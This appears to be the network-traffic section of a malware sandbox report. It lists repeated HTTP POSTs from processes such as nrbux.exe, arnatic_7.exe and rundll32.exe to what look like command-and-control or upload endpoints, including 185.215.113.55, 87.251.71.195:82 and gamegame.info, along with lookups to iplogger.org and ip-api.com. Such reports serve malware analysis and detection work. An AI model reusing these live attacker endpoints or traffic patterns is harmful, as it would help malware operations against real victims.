                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        HEAD http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        2.1kB
                                                                                                                                                                                        6.8kB
                                                                                                                                                                                        17
                                                                                                                                                                                        20
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        724 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        4
                                                                                                                                                                                        3
| Destination | Domain / URL | Protocol | Process | Sent | Received | Packets out | Packets in | HTTP request | HTTP response |
|---|---|---|---|---|---|---|---|---|---|
| 8.8.4.4:443 | dns.google | tls | chrome.exe | 701 B | 172 B | 4 | 4 | | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B | 445 B | 8 | 7 | POST http://185.215.113.55/t5BnOoke2/index.php | 200 |
| 8.8.4.4:443 | dns.google | tls | chrome.exe | 701 B | 172 B | 4 | 4 | | |
| 88.99.66.31:443 | https://iplogger.org/18hh57 | tls, http | jooyu.exe | 1.4kB | 6.5kB | 12 | 16 | GET https://iplogger.org/18hh57 | 200 |
| 220.125.1.129:80 | http://lahuertasonora.com/upload/ | http | | 670 B | 793 B | 5 | 5 | POST http://lahuertasonora.com/upload/ | 404 |
| 220.125.1.129:80 | http://lahuertasonora.com/upload/ | http | | 842 B | 793 B | 5 | 5 | POST http://lahuertasonora.com/upload/ | 404 |
| 220.125.1.129:80 | http://lahuertasonora.com/upload/ | http | | 750 B | 793 B | 5 | 5 | POST http://lahuertasonora.com/upload/ | 404 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 732 B | 132 B | 3 | 3 | POST http://iw.gamegame.info/report7.4.php | |
| 185.215.113.55:80 | http://185.215.113.55//t5BnOoke2/index.php | http | rundll32.exe | 335 B | 348 B | 4 | 4 | POST http://185.215.113.55//t5BnOoke2/index.php | 200 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.9kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B | 212 B | 5 | 5 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.4kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 204.79.197.200:443 | ieonline.microsoft.com | tls, http2 | MicrosoftEdge.exe | 1.6kB | 8.3kB | 25 | 24 | | |
| 204.79.197.200:443 | https://www.bing.com/cortanaassist/rules?cc=US&version=6 | tls, http2 | MicrosoftEdge.exe | 3.4kB | 50.0kB | 59 | 57 | GET https://www.bing.com/cortanaassist/rules?cc=US&version=6 | 404 |
| 204.79.197.200:443 | www.bing.com | tls, http2 | MicrosoftEdge.exe | 1.5kB | 8.2kB | 23 | 22 | | |
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        796 B
                                                                                                                                                                                        485 B
                                                                                                                                                                                        8
                                                                                                                                                                                        8

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
| Destination | URL | Protocol | Process | Sent | Received | Packets sent | Packets received | HTTP request | HTTP response |
|---|---|---|---|---|---|---|---|---|---|
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 552 B | 172 B | 4 | 4 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 690 B | 292 B | 7 | 7 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.3kB | 13.8kB | 15 | 14 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 920 B | 492 B | 12 | 12 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B | 445 B | 8 | 7 | POST http://185.215.113.55/t5BnOoke2/index.php | 200 |
| 208.95.112.1:80 | http://ip-api.com/json/?fields=8198 | http | SystemNetworkService | 1.2kB | 1.0kB | 14 | 13 | GET http://ip-api.com/json/?fields=8198 (twice) | 200 (twice) |
| 172.67.200.215:80 | http://ol.gamegame.info/report7.4.php | http | SystemNetworkService | 1.3kB | 13.9kB | 16 | 15 | POST http://ol.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.3kB | 13.9kB | 15 | 14 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.4kB | 14.0kB | 17 | 16 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | | | |
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        750 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        375 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
| Destination | URL | Proto | Process | Sent | Received | Pkts sent | Pkts received | HTTP Request | HTTP Response |
|---|---|---|---|---|---|---|---|---|---|
| (entry continued from above) | | | | | | 15 | 14 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.9kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B | 445 B | 8 | 7 | POST http://185.215.113.55/t5BnOoke2/index.php | 200 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.4kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B | 212 B | 5 | 5 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B | 212 B | 5 | 5 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.3kB | 13.9kB | 15 | 14 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.8kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B | 212 B | 5 | 5 | POST http://87.251.71.195:82/ | |
| 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B | 445 B | 8 | 7 | POST http://185.215.113.55/t5BnOoke2/index.php | 200 |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.3kB | 13.9kB | 15 | 14 | POST http://iw.gamegame.info/report7.4.php | 403 |
